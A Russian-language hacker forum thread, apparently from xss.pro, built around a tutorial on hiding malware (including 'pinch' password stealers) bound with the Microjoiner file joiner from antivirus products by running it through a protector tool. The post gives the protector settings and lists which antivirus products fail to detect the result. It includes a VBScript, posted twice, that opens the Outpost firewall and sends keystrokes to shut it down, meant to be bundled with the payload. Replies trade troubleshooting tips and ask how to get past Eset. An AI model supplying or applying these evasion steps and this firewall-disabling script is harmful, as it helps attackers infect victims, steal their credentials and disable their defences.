Прячем MICROJOIN'енные файлы

[итэдэ]

Итак, сегодня мы будем прятать Сджойненные файлы от Касперского и др. AVP
Рассмотрим знаменитый склейщик файлов Microjoiner (пс это самый лучший склейщик файлов на сегодняшний день б/п) .
Как ? У тебя еще нет такого.. бегом на www.cobans.net
Теперь склевай там своих пинчей с чем хочешь.. Далее берем одну интересную программку.. называеццо [SVK]

Полную версию можно взять тут
Скачать|Download
pass: xss.pro/
Настраивать ее не надо, тока
Во вкладке Special Option снимите c Remove .reloc section...
и cо Strip overlays
Там, где... Name for last section напишите чтонибуть вроде .avp must die!
Жмем Protect..
Проверяим касперским - вирус ноу фаунд
Проверяем Макафи - вирус нот фаунд
Проверяем Norton - вирус нот фаунд
Проверяем др.Вэп- мда.. ну не зря же все его эвристику хвалят
Насчет НОДа... незнаю.. не стоит
минус этого способа.. размер исходного файло ощутимо увеличивается!

пс.. также рекомендую приджойнить вот такой вот сценарий - выгружает широкорасспространенный файрвол Outpost..

set WShell = CreateObject("WScript.Shell")

WShell.Exec "C:\Program Files\Agnitum\Outpost Firewall\outpost.exe"
WScript.Sleep 200
WShell.AppActivate "Agnitum", TRUE
WScript.Sleep 100
WShell.SendKeys "{F10}{DOWN}{UP}{ENTER}"
WScript.Sleep 100
WShell.SendKeys "{ENTER}"

вставьте в блокнот - сохраните с расширением *.vbs

Удачи!


--------------------------
Информация выложена ТОЛЬКО в ознакомительных целях! Я (автор) не несу никакой ответственности за вред, который может быть нанесен каким либо лицам после прочтения данного материала.
(с) ..::итэдэ http://xss.pro/

 

[SiNem]

Я сам этим не занимаюсь,мне это не надо,но у меня вопросик возник:
на многих форумах предлагают спрятать вирь от антивиря за деньги.
Там технологии чем-нибудь отличаются?

 

[итэдэ]

у каждого свои методы...
но в целом похоже.. ИМХО

 

[BUG(O)R]

Метод один и тот же у всех

 

[Spawn™]

не получается у меня сделать...

пишет

Error: file has wrong or destroyed import table!

 

[итэдэ]

Скорее всего ты поставил галочку при склеивании на "ПАКОВАТЬ"
Сними...

 

[Spawn™]

УРА!! получилось!! спасибо за помошь!!! риспект!!

 

[doomer_exe]

del

 

[St.]

SiNem: Я сам этим не занимаюсь,мне это не надо,но у меня вопросик возник:
на многих форумах предлагают спрятать вирь от антивиря за деньги.
Там технологии чем-нибудь отличаются?

технологии почти такие же, но размер файла не изменяется или слегка становится больше, но не на много ........

 

[SiNem]

Уже не актуально

 

[doomer_exe]

del

 

[MekJack]

Panda не в дауне!!! По крайней мере при запуске..

 

[Маринка]

2 MekJack: файлы после микроджоинера проверяй только в статическом состоянии ( на диске)

при запуске может палится не склейка а файлыы которые были склеены, если их не прятали ( что весьма вероятно)

смотри на какой файл ругается твой авер

 

[MekJack]

ну запускаю то я xinch'a...воообще странно он то палится, то нет(моим AVP ), а как его спрятать? он вроде всего-то к http коннектиться...

 

[doomer_exe]

del

 

[MekJack]

Счастье будет всегда или только пока не запускали?

 

[Bass]

Как Eset ломануть?

 

[Bass]

???
Добавлено в [time]1141086935[/time]
Не понял?

 

[doomer_exe]

del

 

[итэдэ]

Это досихпор актуально ?
Я в шоке!

ps.. касперский сашол с ума.. вот это

set WShell = CreateObject("WScript.Shell")

WShell.Exec "C:\Program Files\Agnitum\Outpost Firewall\outpost.exe"
WScript.Sleep 200
WShell.AppActivate "Agnitum", TRUE
WScript.Sleep 100
WShell.SendKeys "{F10}{DOWN}{UP}{ENTER}"
WScript.Sleep 100
WShell.SendKeys "{ENTER}"

определяеццо как пинч :lol: